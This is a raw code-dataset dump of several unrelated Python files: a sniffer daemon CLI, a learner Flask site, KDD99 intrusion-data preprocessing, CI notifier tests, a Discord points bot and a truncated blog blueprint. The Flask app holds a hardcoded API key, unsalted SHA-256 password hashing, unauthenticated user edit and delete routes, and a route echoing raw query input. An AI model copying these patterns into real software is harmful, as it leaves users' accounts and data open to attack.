)(\".*\")')\n\n","sub_path":"_scripts/cloudinapi.py","file_name":"cloudinapi.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"529847577","text":"# Sniffer cli called by sniffy script (bin/sniffy)\n# Will call argument parser, set logger object,\n# daemonize if required and set signal handlers\nimport os\nimport sys\nimport signal\nfrom sniffy import constants as C\nfrom sniffy.utils.parser import parse_arguments\nfrom sniffy.utils.logger import Log\nimport sniffy.core.engine\n\n\"\"\"\nTry to import daemon and show error w/ install\ninstructions if it cannot be imported\n\"\"\"\ntry:\n import daemon\nexcept ImportError:\n sys.stderr.write(\"ERROR: You must have python-daemon installed.\\n\")\n sys.stderr.write(\"You can install it by running: sudo pip install python-daemon\\n\")\n exit(1)\n\ndef run():\n global log\n global sniffer\n\n # Parse command line arguments\n args = parse_arguments()\n\n # Instantiate log class\n logger = Log(args.logfile)\n log = logger.set_logger()\n handler = logger.get_handler()\n\n # Add stdout logging when not daemonizing\n if not args.daemonize: logger.log_to_console()\n\n # Instantiate sniffy core engine\n sniffer = sniffy.core.engine.Sniffy(args, log)\n\n # Set logger debug if requested\n if args.debug: logger.set_debug()\n\n # Daemon?\n if args.daemonize:\n context = 
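Editor's note: `extract_assets` above has to remember that the data lives in groups 1, 3, 5, 7, 9 and 11, which is easy to misread. A sketch of the same filename grammar with named groups instead of indices; the sample filename is made up.

```python
import re

# Same grammar as CardRegex.regex_model, but self-documenting via named groups.
CARD_RE = re.compile(r'''
    (?P<group>[a-zA-Z]+) _
    (?P<card>[a-zA-Z]+) _
    (?P<box>[a-zA-Z]+) _
    (?P<value>[0-9]+) __
    (?P<description>[0-9a-zA-Z-,()]+)
    (?: __ (?P<author>\w+) )?
''', re.VERBOSE)

m = CARD_RE.match('animals_cat_wood_3__a-small-box__alice')  # made-up example
if m:
    print(m.group('group'), m.group('card'), m.group('box'),
          m.group('value'), m.group('description'), m.group('author'))
```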
daemon.DaemonContext()\n\n # Preserve logger handler\n context.files_preserve = [handler.stream]\n\n # Set signal handlers\n context.signal_map = {\n signal.SIGTERM: cleanup,\n signal.SIGHUP: cleanup,\n signal.SIGUSR1: reload_sniffer}\n # Daemonize\n with context:\n sniffer.start()\n else:\n # Set signal handlers when not daemonizing\n signal.signal(signal.SIGHUP, cleanup)\n signal.signal(signal.SIGINT, cleanup)\n signal.signal(signal.SIGUSR1, reload_sniffer)\n sniffer.start()\n\ndef cleanup(signum, frame):\n global log\n if signum == 2:\n log.info(\"User aborted. Terminating.\")\n else:\n log.info(\"%s caught. Terminating.\" % C.SIGNALS_TO_NAMES_DICT[signum])\n sys.exit(1)\n\ndef reload_sniffer(signum, frame):\n global log\n log.debug(\"%s caught. Reloading...\" % C.SIGNALS_TO_NAMES_DICT[signum])\n sniffer.start(msg=\"Restarting sniffer...\")\n","sub_path":"lib/sniffy/cli/sniffer.py","file_name":"sniffer.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"142520202","text":"import codecs\nimport json\nimport tempfile\nimport uuid\n\nfrom flask import Flask, render_template, request, redirect, url_for, make_response, send_file\nimport random\nimport datetime\nimport hashlib\nimport json_api as API\nfrom models import Users, SecretNumberStore, db\n\nAPPID = \"439d4b804bc8187953eb36d2a8c26a02\"\n\napp = Flask(__name__)\ndb.create_all()\n\nCOOKIE_ID_STRING = \"lucky_number/secret_number_identifier\"\n\n\ndef hash_password(password):\n return hashlib.sha256(password.encode()).hexdigest()\n\n\n@app.route(\"/\")\ndef main():\n return render_template(\"main.html\")\n\n\n@app.route(\"/fakebook\")\ndef fakebook():\n return render_template(\"fakebook.html\")\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/lucky_number\", methods=['GET', 'POST'])\ndef lucky_number():\n if request.method == \"GET\":\n\n secret_number_identifier = request.cookies.get(COOKIE_ID_STRING)\n secret_number_store = db.query(SecretNumberStore).filter_by(cookie_identifier=secret_number_identifier).first()\n\n if not secret_number_store:\n secret_number = random.randint(1, 10)\n cookie_identifier = str(uuid.uuid4())\n secret_number_store = SecretNumberStore(\n cookie_identifier=cookie_identifier,\n secret_number=secret_number\n )\n db.add(secret_number_store)\n db.commit()\n\n context = {\n \"date_of_number\": datetime.datetime.now().isoformat(),\n }\n\n response = make_response(render_template(\"lucky_number.html\", **context))\n response.set_cookie(COOKIE_ID_STRING, str(secret_number_store.cookie_identifier))\n return response\n\n elif request.method == \"POST\":\n user_guess = request.form.get('number')\n cookie_identifier = request.cookies.get(COOKIE_ID_STRING)\n\n secret_number_store = db.query(SecretNumberStore).filter_by(cookie_identifier=cookie_identifier).first()\n\n app.logger.info(f\"Secret Number Guess: user guess: {user_guess}, cookie identifier: {cookie_identifier}\")\n\n if secret_number_store and (int(user_guess) == secret_number_store.secret_number):\n response = make_response(redirect(url_for('lucky_number_success')))\n response.set_cookie(COOKIE_ID_STRING, expires=0)\n\n db.delete(secret_number_store)\n db.commit()\n app.logger.info(f\"User guessed number correctly, removing number with identifier: {cookie_identifier}\")\n return response\n else:\n app.logger.info(f\"User guessed number incorrectly, redirecting to guessing page\")\n app.logger.error(f\"ERROR: 
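Editor's note: the sniffer CLI above relies on two `DaemonContext` details that are easy to miss: `files_preserve` keeps the log handler's file descriptor open across the daemon fork, and `signal_map` routes signals to handlers inside the daemonized process. The same pattern in isolation; the log path and handler names are placeholders.

```python
import logging
import signal
import daemon  # python-daemon

logger = logging.getLogger("sniffy-demo")
handler = logging.FileHandler("/tmp/sniffy-demo.log")  # placeholder path
logger.addHandler(handler)

def on_term(signum, frame):
    logger.info("terminating")
    raise SystemExit(0)

context = daemon.DaemonContext(
    # Without files_preserve, DaemonContext closes all fds, including the log's.
    files_preserve=[handler.stream],
    signal_map={signal.SIGTERM: on_term, signal.SIGHUP: on_term},
)

with context:
    logger.info("daemonized")
```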
bad guess! do not repeat!\")\n            return redirect(url_for('lucky_number'))\n\n\n@app.route(\"/lucky_number/success\", methods=[\"GET\"])\ndef lucky_number_success():\n    return render_template(\"lucky_number_success.html\")\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n    if request.method == \"GET\":\n        users = db.query(Users).all()\n        context = {\n            \"users\": users\n        }\n        return render_template(\"register.html\", **context)\n    elif request.method == \"POST\":\n        username = request.form.get(\"username\")\n        password = request.form.get(\"password\")\n\n        # hash password, to protect against DB breaches\n        hashed_password = hash_password(password)\n        # save hashed password in the database with the new user\n        new_user = Users(name=username, password=hashed_password, secret_number=10)\n        db.add(new_user)\n        db.commit()  # persist all added objects in a single transaction.\n\n        return redirect(url_for('register'))\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n    if request.method == \"GET\":\n        return render_template(\"login.html\")\n    elif request.method == \"POST\":\n        username = request.form.get(\"username\")\n        password = request.form.get(\"password\")\n\n        hashed_password = hash_password(password)\n        user = db.query(Users).filter_by(name=username, password=hashed_password).first()\n        if user is not None:\n            # create new login token for the user and save it in the DB\n            user.login_token = str(uuid.uuid4())\n            db.add(user)\n            db.commit()\n\n            # set token in the browser, to identify logged in user in the future.\n            response = make_response(redirect(url_for('main')))\n            response.set_cookie('login_token', user.login_token)\n\n            return response\n        else:\n            return redirect(url_for('login'))\n\n\n@app.route(\"/logout\", methods=[\"GET\"])\ndef logout():\n    # identify user in the DB based on token, if token is available\n    login_token = request.cookies.get(\"login_token\")\n    # if no cookie is available, then redirect to login page directly\n    if login_token is None:\n        return redirect(url_for(\"login\"))\n    # if cookie is available, find user with that login token, and :\n    # - remove token in DB (= overwrite with \"\")\n    user = db.query(Users).filter_by(login_token=login_token).first()\n    if user is not None:\n        user.login_token = \"\"\n        db.add(user)\n        db.commit()\n\n        # - remove cookie from browser\n        response = make_response(redirect(url_for('login')))\n        response.set_cookie(\"login_token\", expires=0)\n        return response\n\n    # redirect to login page\n    return redirect(url_for(\"login\"))\n\n\n@app.route(\"/users/<user_id>/edit\", methods=[\"GET\", \"POST\"])\ndef edit_user(user_id):\n\n    user = db.query(Users).get(int(user_id))\n    if user is None:\n        return redirect(url_for('register'))\n\n    if request.method == \"GET\":\n        return render_template(\"user_edit.html\", user=user)\n    elif request.method == \"POST\":\n        # post parameter\n        secret_number = request.form.get(\"secret_number\")\n        login_token = request.form.get(\"login_token\")\n\n        user.secret_number = secret_number\n        user.login_token = login_token\n\n        db.add(user)\n        db.commit()\n\n        return redirect(url_for('register'))\n\n# path variable\n@app.route(\"/users/<user_id>/delete\", methods=[\"GET\"])\ndef delete_user(user_id):\n    user = db.query(Users).get(int(user_id))\n    if user is None:\n        return redirect(url_for(\"register\"))\n    if request.method == \"GET\":\n        response = make_response(redirect(url_for('register')))\n        db.delete(user)\n        db.commit()\n        return response\n\n# url parameters, get parameters\n@app.route(\"/weather\", methods=[\"GET\"])\ndef 
weather():\n\n user_cities = request.args.get(\"city\")\n if user_cities:\n weather_list = [API.get_city_weather(city, APPID) for city in user_cities.split(\",\")\n if API.get_city_weather(city, APPID) is not None]\n else:\n cities = [\"Berlin\", \"Barcelona\", \"Vienna\", \"Rome\", \"St. Pölten\", \"Athens\", \"Lisbon\"]\n\n weather_list = [API.get_city_weather(city, appId=APPID) for city in cities]\n\n download_string = request.url_root + \"download/weather\"\n if user_cities:\n download_string += \"?city=\"+user_cities\n\n context = {\n \"weather_list\": weather_list,\n \"downloadlink\": download_string\n }\n\n return render_template(\"weather.html\", **context)\n\n\n@app.route(\"/download/weather\", methods=[\"GET\"])\ndef download_weather():\n\n user_cities = request.args.get(\"city\")\n if user_cities:\n weather_list = [API.get_city_weather(city, APPID) for city in user_cities.split(\",\")\n if API.get_city_weather(city, APPID) is not None]\n else:\n cities = [\"Berlin\", \"Barcelona\", \"Vienna\", \"Rome\", \"St. Pölten\", \"Athens\", \"Lisbon\"]\n\n weather_list = [API.get_city_weather(city, appId=APPID) for city in cities]\n\n handle, filepath = tempfile.mkstemp()\n with codecs.open(filepath, \"w\", encoding=\"utf-8\") as output:\n json.dump(weather_list, output)\n\n return send_file(filepath, as_attachment=True, attachment_filename=\"cities.json\")\n\n@app.route(\"/mockup\", methods=[\"GET\"])\ndef mockup():\n _directory_0 = request.args.get(\"pos_0\", \"\")\n _directory_90 = request.args.get(\"pos_90\", \"\")\n _result = request.args.get(\"result\", \"\")\n if _directory_0:\n files: dict = {}\n if _directory_90:\n data_90 = {}\n\n if _result:\n return _result\n else:\n _result = [] if random.random()<0.5 else [1]\n return json.dumps(_result)\n\n\n# TODO TODAY:\n# - Post Form finish, get input parameters from request\n# - Cookies\n# - Database\n\n\n# TODO: 1) add boogle site\n# TODO: 2) add hair dresser site\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"255531700","text":"# import pandas as pd\n# import seaborn as sns #pallete des coleurs\nimport matplotlib.pyplot as plt #affichage des figure\nfrom pandas import read_csv, crosstab,DataFrame\n\nimport os\nworkpath = os.path.dirname(os.path.abspath(__file__))\n\n\ncolumns = (['duration'\n,'protocol_type'\n,'service'\n,'flag'\n,'src_bytes'\n,'dst_bytes'\n,'land'\n,'wrong_fragment'\n,'urgent'\n,'hot'\n,'num_failed_logins'\n,'logged_in'\n,'num_compromised'\n,'root_shell'\n,'su_attempted'\n,'num_root'\n,'num_file_creations'\n,'num_shells'\n,'num_access_files'\n,'num_outbound_cmds'\n,'is_host_login'\n,'is_guest_login'\n,'count'\n,'srv_count'\n,'serror_rate'\n,'srv_serror_rate'\n,'rerror_rate'\n,'srv_rerror_rate'\n,'same_srv_rate'\n,'diff_srv_rate'\n,'srv_diff_host_rate'\n,'dst_host_count'\n,'dst_host_srv_count'\n,'dst_host_same_srv_rate'\n,'dst_host_diff_srv_rate'\n,'dst_host_same_src_port_rate'\n,'dst_host_srv_diff_host_rate'\n,'dst_host_serror_rate'\n,'dst_host_srv_serror_rate'\n,'dst_host_rerror_rate'\n,'dst_host_srv_rerror_rate'\n,'attack'\n,'level'])\n\n\ndef traindata():\n file = open(os.path.join(workpath, \"data/KDD99Train.csv\"), 'rb')\n return read_csv(file,header=None, names = columns)\n\n\ndef testdata():\n file = open(os.path.join(workpath, \"data/KDD99Test.csv\"), 'rb')\n return read_csv(file,header=None, names = 
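Editor's note: `hash_password` in the main.py record above applies a single unsalted SHA-256, so identical passwords hash identically and offline brute-forcing is cheap. A sketch of a salted, iterated alternative using only the standard library (the iteration count is illustrative; `werkzeug.security.generate_password_hash` would be the usual Flask-side shortcut).

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    # Per-user random salt plus many PBKDF2 iterations slow offline attacks.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + ":" + digest.hex()

def verify_password(password, stored):
    salt_hex, _ = stored.split(":")
    recomputed = hash_password(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(recomputed, stored)

token = hash_password("hunter2")
print(verify_password("hunter2", token))  # True
print(verify_password("wrong", token))    # False
```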
columns)\n\n\ndef verification(df):\n d = df[df.duplicated()] # les lignes dupliquer\n Nan = df[df.isna().any(axis=1)] #les cellules null\n msg = [0]*2 \n msg[0] = 'Il y a {} lignes est repete'.format(len(d))\n msg[1] = 'Il y a {} valeurs null'.format(len(Nan))\n return msg\n\n\ndef QualitativeColonnes(df):\n msg=[]\n for col in df.columns:\n if df[col].dtype == 'object':\n nbCat = len(df[col].value_counts())\n msg.append('Colonne : {} a {} categories'.format(col, nbCat))\n\n return msg \n\n\ndef DiagCirculaire(df,name):\n ax = crosstab(df.attack, df.protocol_type)\n ax.columns = [''] * len(ax.columns)\n ax.plot(kind='pie',labels=None,subplots=True,figsize=(15,10),title=['ICMP','TCP', 'UDP'])\n # plt.legend(loc='center left',labels=ax.index,bbox_to_anchor=(0.88, 0.5))\n plt.legend(loc='lower right',labels=ax.index,ncol=round(len(ax.index)/5),bbox_to_anchor=(0.88, -0.3))\n plt.figtext(.5,.8,name, fontsize=30, ha='center')\n\n pathimage = \"assets/img/figure/\"+name+\".svg\"\n path = os.path.join(*[workpath.replace(\"kdd99\",\"\"), \"static/\",pathimage])\n try:\n os.remove(path)\n except OSError:\n pass\n plt.savefig(path)\n plt.clf()\n plt.close()\n\n return pathimage\n\ndef symboliquecolonne(df):\n\n Qualitative_col = ['protocol_type','service','flag']\n\n return df[Qualitative_col]\n\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\ndef applyLabelEncoder(df):\n return df.apply(LabelEncoder().fit_transform)\n\ndef dummyColonnesHeader(df):\n str = ['Protocol_','service_','flag_']\n protocol_type=sorted(df.protocol_type.unique())\n protocol_list=[str[0] + x for x in protocol_type]\n service=sorted(df.service.unique())\n service_list=[str[1] + x for x in service]\n flag=sorted(df.flag.unique())\n flag_list=[str[2] + x for x in flag]\n return protocol_list + service_list + flag_list\n\n\ndef applyOneHotEncoder(df_LbEn,df_symb):\n enc = OneHotEncoder()\n data_transform = enc.fit_transform(df_LbEn)\n return DataFrame(data_transform.toarray(),columns=dummyColonnesHeader(df_symb))\n\ndef equilibrage(diff_list,df):\n for col in diff_list:\n df[col] = 0\n return df\n\ndef getcopy(df):\n return df.copy()\n\ndef df_jointure(df_old,df_new):\n return df_old.join(df_new)\n\ndef suppression(df):\n df.drop('protocol_type', axis=1, inplace=True)\n df.drop('service', axis=1, inplace=True)\n df.drop('flag', axis=1, inplace=True)\n return df\n\ndef Attacks(attack):\n Dos = ['neptune.','land.','pod.','smurf.','teardrop.','back.','worm.','udpstorm.','processtable.','apache2.']\n Probe = ['ipsweep.','satan.','nmap.','portsweep.','mscan.','saint.']\n R2l = ['ftp_write.','guess_passwd.','imap.','multihop.','phf.','spy.','warezclient.','warezmaster.','snmpguess.','named.','xlock.','xsnoop.','snmpgetattack.','httptunnel.','sendmail.']\n U2r = ['buffer_overflow.','loadmodule.','perl.','rootkit.','ps.','xterm.','sqlattack.']\n if attack in Dos:\n atk = 1\n elif attack in Probe:\n atk = 2\n elif attack in R2l:\n atk = 3\n elif attack in U2r:\n atk = 4\n else:\n atk = 0\n return atk\n\ndef applayAttack(df):\n df_attack_types = df.attack.apply(Attacks)\n df['attack'] = df_attack_types\n return df\n\n\ndef DiagAttack(df, name):\n ax = df.attack.value_counts()\n ax.plot(kind='pie',labels=None,subplots=True,figsize=(5,8))\n # plt.legend(loc='center left',labels=['Normal','DOS','Probe','R2L','U2R'],bbox_to_anchor=(0.88, 0.5))\n plt.legend(loc='lower right',labels=['Normal','DOS','Probe','R2L','U2R'],ncol=3,bbox_to_anchor=(0.93, -0.1))\n plt.figtext(.5,.8,name,fontsize=10, ha='center')\n pathimage = 
\"assets/img/figure/\"+name+\".svg\"\n path = os.path.join(*[workpath.replace(\"kdd99\",\"\"), \"static/\",pathimage])\n try:\n os.remove(path)\n except OSError:\n pass\n plt.savefig(path)\n plt.clf()\n plt.close()\n\n\n return pathimage","sub_path":"kdd99/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"374061900","text":"import contextlib\nimport io\nimport json\nimport os\nimport unittest\nimport unittest.mock\n\nimport process\n\nTEST_ENVIRON = {\n \"GITHUB_EVENT_PATH\": \"/dev/null\",\n \"GITHUB_TOKEN\": \"TOOOKEN\",\n \"CI_APP_NAME\": \"Cirrus CI\",\n \"SMTP_HOST\": \"localhost\",\n \"SMTP_PORT\": \"25\",\n \"SMTP_USER\": \"unittest\",\n \"SMTP_PASS\": \"test\",\n \"MAIL_FROM\": \"from@localhost\",\n \"MAIL_TO\": \"to@localhost\",\n}\n\n\n@unittest.mock.patch.dict(os.environ, TEST_ENVIRON)\n@unittest.mock.patch(\"smtplib.SMTP\")\n@unittest.mock.patch(\"requests.get\")\nclass Test(unittest.TestCase):\n\n def setUp(self):\n self.stdout = io.StringIO()\n self.stderr = io.StringIO()\n\n def data(self, fn):\n return os.path.join(\"test_data\", fn)\n\n def test_normal_pr(self, api_mock, smtp_mock):\n os.environ[\"GITHUB_EVENT_PATH\"] = self.data(\"normal_pr.json\")\n\n with contextlib.redirect_stdout(self.stdout):\n with self.assertRaises(SystemExit) as exit_exc:\n process.main()\n\n api_mock.assert_not_called()\n\n self.assertEqual(\n \"Skip processing check_suite triggered via Pull Request\\n\",\n self.stdout.getvalue(),\n )\n self.assertEqual(0, exit_exc.exception.code)\n smtp_mock.assert_not_called()\n\n def test_pr_merged(self, api_mock, smtp_mock):\n os.environ[\"GITHUB_EVENT_PATH\"] = self.data(\"merged_pr.json\")\n os.environ[\"SKIP_CONCLUSIONS\"] = \"none\"\n\n with contextlib.redirect_stdout(self.stdout):\n process.main()\n\n api_mock.assert_called_with(\n \"https://api.github.com/repos/awelzel/zeek-ci/check-suites/10621428778/check-runs\",\n headers=unittest.mock.ANY,\n )\n\n self.assertEqual(\n 'Sending email for success check_suite \"Cirrus CI\"...\\n',\n self.stdout.getvalue(),\n )\n smtp_mock.assert_called_with(host=\"localhost\", port=\"25\", timeout=30)\n smtp_mock.return_value.ehlo.assert_called()\n smtp_mock.return_value.sendmail.assert_called_with(\n \"from@localhost\", [\"to@localhost\"], unittest.mock.ANY\n )\n\n def test_pr_other_repo(self, api_mock, smtp_mock):\n os.environ[\"GITHUB_EVENT_PATH\"] = self.data(\"pr_in_other_repo.json\")\n os.environ[\"SKIP_CONCLUSIONS\"] = \"none\"\n\n with open(self.data(\"check-runs/10617855470.json\")) as f:\n api_mock.return_value.status_code = 200\n api_mock.return_value.json.return_value = json.load(f)\n\n with contextlib.redirect_stdout(self.stdout):\n process.main()\n\n api_mock.assert_called_with(\n \"https://api.github.com/repos/zeek/zeek/check-suites/10617855470/check-runs\",\n headers=unittest.mock.ANY,\n )\n\n self.assertEqual(\n 'Sending email for success check_suite \"Cirrus CI\"...\\n',\n self.stdout.getvalue(),\n )\n smtp_mock.assert_called_with(host=\"localhost\", port=\"25\", timeout=30)\n smtp_mock.return_value.ehlo.assert_called()\n smtp_mock.return_value.sendmail.assert_called_with(\n \"from@localhost\", [\"to@localhost\"], unittest.mock.ANY\n )\n body = smtp_mock.return_value.sendmail.call_args[0][2]\n self.assertIn(\"Cirrus CI conclusion: success\\n\", body)\n self.assertIn(\"branch: master\\n\", body)\n self.assertIn(\"success: 23\\n\", body)\n 
self.assertNotIn(\"failure:\", body)\n\n def test_cancelled_tasks(self, api_mock, smtp_mock):\n os.environ[\"GITHUB_EVENT_PATH\"] = self.data(\"release_branch_fail_cancelled.json\")\n os.environ[\"SKIP_CONCLUSIONS\"] = \"none\"\n with open(self.data(\"check-runs/10633706651.json\")) as f:\n api_mock.return_value.status_code = 200\n api_mock.return_value.json.return_value = json.load(f)\n\n with contextlib.redirect_stdout(self.stdout):\n process.main()\n\n api_mock.assert_called_once()\n\n self.assertEqual(\n 'Sending email for failure check_suite \"Cirrus CI\"...\\n',\n self.stdout.getvalue(),\n )\n smtp_mock.assert_called_with(host=\"localhost\", port=\"25\", timeout=30)\n smtp_mock.return_value.ehlo.assert_called()\n smtp_mock.return_value.sendmail.assert_called_with(\n \"from@localhost\", [\"to@localhost\"], unittest.mock.ANY\n )\n\n body = smtp_mock.return_value.sendmail.call_args[0][2]\n self.assertIn(\"success: 12\\n\", body)\n self.assertIn(\"failure: 1\\n\", body)\n self.assertIn(\"cancelled: 10\\n\", body)\n self.assertIn(\"debian10 (failure):\", body)\n","sub_path":"test_process.py","file_name":"test_process.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"22329258","text":"import random\nfrom datetime import datetime, timedelta\nfrom logging import getLogger\nimport discord\nfrom discord.embeds import Embed\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom MainService.Point.point_DB import PointDB\nfrom settings import debug\n\nlog = getLogger(__name__)\n\npoint_table = {\n 'first': 50000,\n 'sleep': 2000,\n 'daily': 10000,\n}\nrandom_box_time = timedelta(days=1)\nrandom_max_point = 10000\nrandom_min_point = 1\n\n\nclass PointEngine:\n sleep_list = {}\n box_list = {}\n schedule = BackgroundScheduler()\n PointDB.initDB()\n\n def __init__(self):\n log.info(\"PointEngine init 실제 동작 안함\")\n\n @classmethod\n def initSchedule(cls):\n # 초기화\n cls.initUserList()\n # 스캐줄 생성\n cls.schedule.start()\n if not debug:\n cls.schedule.add_job(cls.dailyReset, 'cron', hour=12, id=\"dailyReset\")\n else:\n cls.schedule.add_job(cls.dailyReset, 'cron', second=40, id=\"dailyReset\")\n log.info(\"PointEngine init schedule\")\n\n @staticmethod\n def event_info() -> Embed:\n title = \"디스코드 포인트 이벤트\"\n text = '내 집 아니 내 치킨 마련!!'\n em = discord.Embed(title=title, description=text)\n\n title1 = \"포인트 획득 방법\"\n text1 = f\"1. 매일 꾸준히 디스코드 방에 접속하여 출석채크를 한다.\\n\" \\\n f\"2. 자신만의 투자 비법으로 주식 투자. ($stcok)\\n\" \\\n f\"3. 친구들과 내기를 통해 친구 등쳐먹기 ($bet)\\n\" \\\n f\"4. 인생은 운빨, 각종 게임으로 내 운을 시험해 본다. ($game)\"\n em.add_field(name=title1, value=text1, inline=False)\n\n title2 = \"상품 목록\"\n text2 = f\"파인다이닝 런치\\n\" \\\n f\"목표 포인트: 1억 pt\\n\" \\\n f\"수량: 1장 \\n\\n\" \\\n f\"치킨 기프티콘 1장\\n\" \\\n f\"목표 포인트: 3천만원 pt\\n\" \\\n f\"수량: 2장 \\n\\n\"\n em.add_field(name=title2, value=text2, inline=False)\n title3 = \"역대 상품 목록\"\n text3 = f\"1. 
커피 기프티콘 2장 - 모두 상일이가 수령\"\n\n em.add_field(name=title3, value=text3, inline=False)\n footer = '여러분의 후원이 더 좋은 콘텐츠를 만듭니다.'\n em.set_footer(text=footer)\n return em\n\n @classmethod\n def get_point(cls, name: str) -> str:\n if name not in cls.sleep_list:\n text = f\"미등록 사용자 입니다.\"\n return text\n pt = PointDB.get_point(name)\n pt_str = \"{:,}\".format(pt)\n text = f'유저({name})의 획득 포인트는 {pt_str}입니다,'\n return text\n\n @classmethod\n def get_list(cls, name: str) -> str:\n response = PointDB.get_list(name)\n title = f\"사용자: {name}의 점수 리스트\"\n text = \"\"\n for row in response:\n pt_str = \"{:,}\".format(row[2])\n text += f\"{pt_str} pt : \" \\\n f\"날짜({row[4]}), \" \\\n f\"총합({row[5]}) \\n\" \\\n f\"{row[3]}\\n\\n\"\n\n em = discord.Embed(title=title, description=text)\n return em\n\n @classmethod\n def give_point(cls, name: str, point: int) -> str:\n if name not in cls.sleep_list:\n text = f\"미등록 사용자 입니다.\"\n return text\n reason = f\"관리자에 의해 사용자({name})가 포인트를 {point}만큼 획득하였습니다.\"\n PointDB.earn_point_user(name, point, reason)\n pt = PointDB.get_point(name)\n text = f\"관리자에 의해 사용자({name})가 포인트를 획득하셨습니다.\" \\\n f\"획득 포인트: {point}, 총 포인트: {pt}\"\n return text\n\n @classmethod\n def dailyReset(cls):\n for user in cls.sleep_list:\n cls.sleep_list[user] = cls.sleep_list[user] + 1\n PointDB.update_sleep_user(user, cls.sleep_list[user])\n log.info(\"daily user reset: %s\", cls.sleep_list)\n\n @classmethod\n def dailyCheck(cls, name):\n # 최초 채팅 -> 리스트 추가\n if name not in cls.sleep_list:\n PointDB.create_user(name, \"new user\", point_table['first'])\n\n cls.initUserList()\n text = f\"{name}님이 최초로 채팅을 하셨습니다. ㅊㅋㅊㅋ\\n\" \\\n f\"특별 보너스로 {point_table['first']}포인트 적립되었습니다.\"\n return text\n\n # 오늘 처음 채팅 -> 포인트 획득\n if cls.sleep_list[name] != 0:\n # 개근 여부 확인\n if cls.sleep_list[name] == 1:\n get_point = point_table['daily']\n text = f\"{name}이 출석하여 {point_table['daily']}포인트를 획득하셨습니다.\"\n reason = \"출석채크로 포인트 획득\"\n else:\n get_point = point_table['daily'] + point_table[\"sleep\"] * cls.sleep_list[name]\n text = f\"{name}이 {cls.sleep_list[name]}일만에 복귀했습니다.\\n\" \\\n f\"특별 보너스 포인트로 {get_point}포인트를 획득하셨습니다.\"\n reason = \"휴면계정을 복구하셔서 보너스 포인트\"\n\n # 포인트 획득\n PointDB.earn_point_user(name, get_point, reason)\n cls.sleep_list[name] = 0\n return text\n else:\n # 중복 채팅 -> 무시\n return None\n\n @classmethod\n def initUserList(cls):\n # make user list\n tmp_sleepList = PointDB.get_sleepList()\n if tmp_sleepList:\n cls.sleep_list = {user[0]: user[1] for user in tmp_sleepList}\n log.debug(\"bot init sleepList: %s\", cls.sleep_list)\n\n @classmethod\n def random_box(cls, user, betting):\n\n # 처음 받음\n if user not in cls.box_list:\n # 새로 추가\n cls.box_list[user] = datetime.now()\n # 랜덤 박스 열기\n em = cls.open_random_box(user, betting)\n return em\n\n remains_time = datetime.now() - cls.box_list[user]\n # 이미 받음\n if remains_time < random_box_time:\n title = \"랜덤 박스를 열 수 없습니다.\"\n text = f'이미 받았잖아!!!\\n' \\\n f'남은 시간: {random_box_time - remains_time}'\n em = discord.Embed(title=title, description=text)\n return em\n else:\n # 처음은 아니지만 갱신\n cls.box_list[user] = datetime.now()\n # 랜덤 박스 열기\n em = cls.open_random_box(user, betting)\n return em\n\n @classmethod\n def open_random_box(cls, user, betting) -> Embed:\n # 포인트 계산\n rand_point = random.randrange(random_min_point, random_max_point)\n get_point = rand_point + rand_point * (betting/random_max_point)\n # 포인트 입력\n reason = f\"일일 랜덤 박스로 포인트 {get_point} 획득\"\n PointDB.earn_point_user(user, get_point, reason)\n\n # 메세지 작성\n now_pt = PointDB.get_point(user)\n title = \"랜덤 박스를 
열었습니다\"\n        text = f'{user}가 {get_point}pt 획득\\n' \\\n               f'총 {now_pt}pt 보유중'\n        em = discord.Embed(title=title, description=text)\n        return em\n\n    @classmethod\n    def ranking(cls):\n        title = \"포인트 랭킹\"\n        ranking_list = PointDB.get_ranking_List()\n        text = f\"이미 있었지만 아무도 안보는 것 같아서 따로 만드는 랭킹\"\n        em = Embed(title=title, description=text)\n        for user in ranking_list:\n            title1 = f\"{user[0]}\"\n            text1 = f\"{user[1]}pt\"\n            em.add_field(name=title1, value=text1, inline=False)\n        return em\n","sub_path":"MainService/Point/point_engine.py","file_name":"point_engine.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"577797232","text":"\n\nfrom flask import Blueprint\n# from flask import redirect\n# from flask import abort\nfrom flask import request\nfrom flask import render_template\nfrom flask import redirect\nfrom flask import url_for\nfrom flask import session\n\nfrom wtforms import StringField\nfrom wtforms.validators import ValidationError\n\nfrom ..models import Category\nfrom ..models import Article\nfrom ..models import Evaluation\nfrom ..models import BasicSetting\nfrom ..models import Tag\nfrom ..models import arcicle_tags\n\nfrom functools import wraps\n\nfrom ..forms import SearchForm\nfrom sqlalchemy import or_\n\nfrom myBlogApp import db,cache\n\nhome = Blueprint('home',__name__)\n\n\n# read-count decorator\ndef readed_sum(f):\n    @wraps(f) \n    def decorated_function(*args, **kwargs):\n        print(args)\n        print(kwargs)\n        articleID = kwargs['articleID']\n        if articleID is not None:\n            article = Article.query.filter_by(at_id=articleID).first()\n            # update the read count\n            article.updateReadedSum() \n            db.session.add(article)\n            db.session.commit()\n\n        return f(*args, **kwargs)\n    return decorated_function \n\n# cache for functions without arguments\n# caches categories, tags and basic settings 